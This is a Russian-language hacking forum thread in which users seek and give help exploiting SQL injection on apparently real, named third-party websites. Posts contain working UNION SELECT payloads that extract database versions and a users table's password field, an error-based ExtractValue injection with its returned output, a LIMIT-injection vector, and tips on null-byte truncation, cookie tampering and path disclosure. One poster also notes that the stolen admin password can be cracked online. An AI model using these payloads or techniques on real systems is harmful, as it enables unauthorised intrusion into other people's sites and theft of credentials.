не очень удобно раскручивать скулю в куках через браузер. поставь burp suite, или charles. а так можно через Live http headers для ФФ
ну перехвати один из запросов, потом повторно отправляй его меняя куки попробуй нулл-байтом отрезать .php, или же юзать багу со слеш-дотами. ничего нового.
Про слеши - https://rdot.org/forum/archive/index.php/t-2611.html А по скуле... Че тут крутить? http://storeshop.hol.es/gpay?note=b... 1,2,3,4,5,6,7,version(),9,10,11,12,13,14-- '
http://storeshop.hol.es/admin http://storeshop.hol.es/gpay?note=b...10,password,12,13,14+from+users+limit+0,1+--+' пароль не выкладываю, т.к нельзя. Есть на cmd5. Вам и так все расжували уже, пробуйте ручками все делать, а не хевиджем со скулмапом.
Хелп. Нужна помощь в раскрутке. Code: http://tao.kg/?p=search&search=dota+2&Provider=Taobao&SearchMethod=Extended&cid=-1%27 http://dota2.name/request/edit/?act=skype&id=\ POST name=skype&pk=1&value=e Как двигаться дальше через ошибки вида: Code: /page.php site.com/page/ Например: Code: http://kasko-center.by/kasko.courses.php http://www.24tv.by/24old/ Есть ли тут sqli? Code: http://steam-store.ru/pay POST price=3
http://kasko-center.by/kasko.courses.php http://www.24tv.by/24old/ Просто ошибки сайта (раскрытие путей), ничего не делать, искать другие уязвимости.
Ну смотри,ты кое-как нарыл инфу по версиям ПО,теперь проверь есть ли на них уязвимости,сплоиты. Но это тебе не особо поможет.
Invalid multibyte говорит о том, что данные получены не в UTF-8, как ожидала функция, а хз в какой. Этот прием полезен чтобы получить раскрытие путей, что у Вас и получилось Если идти последовательно, то сперва всегда идет сбор данных, а после проверка гипотез
Code: http://www.game-debate.com/benchmark/bm_datatable.php?bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_10=false&bRegex_11=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bRegex_7=false&bRegex_8=false&bRegex_9=false&bSearchable_0=true&bSearchable_1=true&bSearchable_10=true&bSearchable_11=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSearchable_7=true&bSearchable_8=true&bSearchable_9=true&bSortable_0=true&bSortable_1=true&bSortable_10=true&bSortable_11=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&bSortable_8=true&bSortable_9=true&iColumns=12&iDisplayLength=1%27%22&iDisplayStart=0&iSortCol_0=1&iSortingCols=1&mDataProp_0=rbt_tool&mDataProp_1=rb_bench&mDataProp_10=m_graf&mDataProp_11=rbt_test&mDataProp_2=m_cpu_deriv&mDataProp_3=m_graf_deriv&mDataProp_4=rbt_types&mDataProp_5=m_username&mDataProp_6=rb_date&mDataProp_7=rb_id&mDataProp_8=m_id&mDataProp_9=m_cpu&sColumns=&sEcho=3&sSearch=&sSearch_0=&sSearch_1=&sSearch_10=&sSearch_11=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSearch_7=&sSearch_8=&sSearch_9=&sSortDir_0=asc&_=1443468868286 Возможно ли раскрутить?
куки куки, сессию подключения вероятно нужно передавать юзай curl, в firefox(firebug) к тому же можно скопировать запрос в формате curl
В Acunetix есть HTTP Editor, там будет id_goods=1, через XPATH Code: csrf_ytse_token=01cc4a2e39c048f58f725bfe26e5d57c&failpage=http://steamplay.ru /&goods_title=BRILLIANT%20STEAM%20%d0%ba%d0%bb%d1%8e%d1%87%20%2b%5b %20CS%20GO%20Arma%20DAYZ%20GTA%20%5d%2b%20%d0%9f%d0%9e%d0%94%d0%90 %d0%a0%d0%9a%d0%98&id_agent=390191&id_goods=1'or(ExtractValue(0x3a,concat(0x3a,(select version()))))='&price=15&thumbnail=1910800.jpg&token=27091&type_curr=WMR XPATH syntax error: ':5.6.26-74.0-beget-log'
возможно,каков вопрос-такой ответ Дельный совет чуваки,сначало пробуйте методом проб и ошибок,потом задавайте вопрос,это для вас же будет лучше,больше поймте
Вероятно инъекция в LIMIT. Попробуйте применить соответствующий вектор: Code: PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1))) https://rdot.org/forum/showthread.php?t=60&page=3 Функционал, преобразующий номер страницы в числа LIMIT-ов, никогда не был и не будет уязвим к атакам типа SQLi. Если вы видете в ответе что-то вроде этого: Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' Смело считайте, что там ничего нет. Эти инъекции стабильно появляются у нас в теме раз в неделю.
Доброго времени суток друзья, пытаюсь найти что-то интересно и вывести ошибки на сайте. Подставляю кавычку в параметр page, он отображает эту ковычку с обратным слешем. ventilyatory-c-904_26.html?page=2'&filter_id=287 На определенных страницах, пишет "Интернет-магазин закрыт на техническое обслуживание, заходите позже!" ventilyatory-c-904_26.html?ppp=50' Подскажите пожалуйста, можно как-нибудь вывести ошибку в итоге ? И что это за случай ? Заранее спасибо.
